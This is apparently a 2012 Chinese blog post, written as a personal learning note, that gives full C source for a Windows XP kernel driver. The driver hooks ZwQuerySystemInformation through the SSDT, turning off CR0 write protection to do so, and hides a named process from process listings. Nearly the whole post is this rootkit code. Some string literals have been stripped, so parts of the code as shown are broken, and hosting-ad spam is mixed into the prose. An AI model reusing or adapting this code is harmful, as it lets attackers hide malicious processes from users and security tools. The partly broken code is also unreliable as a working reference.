标 题:Rootkit进程篇之进程隐藏 QuerySystemInformation作 者: Y4ng时 间: 2012-07-11 18:30:26 星期三链 接:
rootkit 系列课程在断断续续的学习着,到今天也算一个小阶段因为驱动算是入门了;之前看张帆老师的《Windows驱动开发技术详解》感觉讲的太基础了,虚拟主机,不太适合我这种急性子的人学,草草看完 事后和没看一样。。。
个人觉得毛德操的《windows内核情景分析》搭配网络上高手的文章来学比较适合我这种不按正规路线走的人;
下面是我学习rootkit系列之进程篇的一个小章节,香港服务器租用,美国空间, 记录下来 一来可以备忘,二来可以帮助后来的初学者;
以下代码适用于:windows xp sp3
#include <ntddk.h>///////////////////定义本地结构体//////////////////////////////////////////struct _SYSTEM_THREADS {LARGE_INTEGER KernelTime;LARGE_INTEGER UserTime;LARGE_INTEGER CreateTime;ULONG WaitTime;PVOID StartAddress;CLIENT_ID ClientIs;KPRIORITY Priority;KPRIORITY BasePriority;ULONG ContextSwitchCount;ULONG ThreadState;KWAIT_REASON WaitReason; };typedef struct _SYSTEM_PROCESSES {ULONG NextEntryDelta;ULONG ThreadCount;ULONG Reserved[6];LARGE_INTEGER CreateTime;LARGE_INTEGER UserTime;LARGE_INTEGER KernelTime;UNICODE_STRING ProcessName;KPRIORITY BasePriority;ULONG ProcessId;ULONG InheritedFromProcessId;ULONG HandleCount;ULONG Reserved2[2];VM_COUNTERS VmCounters;IO_COUNTERS IoCounters;struct _SYSTEM_THREADS Threads[1]; }*PSYSTEM_PROCESS, SYSTEM_PROCESS;typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength);/////////////////定义ntoskrnl.exe的服务表结构////////////////////////////////////////////////typedef struct _ServiceDescriptorEntry {unsigned int *ServiceTableBase;unsigned int *ServiceCounterTableBase;unsigned int NumberOfServices;unsigned char *ParamTableBase;}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;typedef struct _KESSDT{PVOID ServiceTableBase;PVOID ServiceCounterTableBase;unsigned int NumberOfService;PVOID ParamTableBase;}ServiceDescriptorEntry, *PServiceDescriptorEntry;__declspec (dllimport)ServiceDescriptorEntry KeServiceDescriptorTable;#define QUERYSYSTEMINFORMATIONID 0xAD#define SystemProcessAndThreadsInformation 5// 变量定义ZWQUERYSYSTEMINFORMATION OldQuerySystemInformation;NTSTATUS MyZwQuerySystemInformation(IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation,IN ULONG SystemInformationLength, OUT PULONG ReturnLength){PSYSTEM_PROCESS systemprocess;PSYSTEM_PROCESS prev;NTSTATUS status;UNICODE_STRING uprocessname;if (NULL == OldQuerySystemInformation){return STATUS_UNSUCCESSFUL;}status = OldQuerySystemInformation(SystemInformationClass, SystemInformation,SystemInformationLength, ReturnLength);if (!NT_SUCCESS(status)){return status;}if (SystemProcessAndThreadsInformation != SystemInformationClass){return status;}RtlInitUnicodeString(&uprocessname, L);systemprocess = (PSYSTEM_PROCESS)SystemInformation;prev = systemprocess;while(systemprocess->NextEntryDelta){if (RtlEqualUnicodeString(&systemprocess->ProcessName, &uprocessname, TRUE)){//prev->NextEntryDelta = systemprocess + systemprocess->NextEntryDelta;prev->NextEntryDelta = prev->NextEntryDelta + systemprocess->NextEntryDelta;DbgPrint();break;}prev = systemprocess;systemprocess = (PSYSTEM_PROCESS)((char*)systemprocess + systemprocess->NextEntryDelta);}return status;}NTSTATUS Unload(PDRIVER_OBJECT DriverObject){ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4);__asm{climov eax, cr0and eax, not 0x10000mov cr0, eax}*((ULONG*)address) = (ULONG)OldQuerySystemInformation;__asm{mov eax, cr0or eax, 0x10000mov cr0, eaxsti}return STATUS_SUCCESS;}NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath){ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4);OldQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)*((ULONG*)address);__asm{climov eax, cr0and eax, not 0x10000mov cr0, eax}*((ULONG*)address) = (ULONG*)MyZwQuerySystemInformation;__asm{mov eax, cr0or eax, 0x10000mov cr0, eaxsti}DriverObject->DriverUnload = Unload;return STATUS_SUCCESS;}放弃那些不愿放弃的,容忍那些不可容忍的。
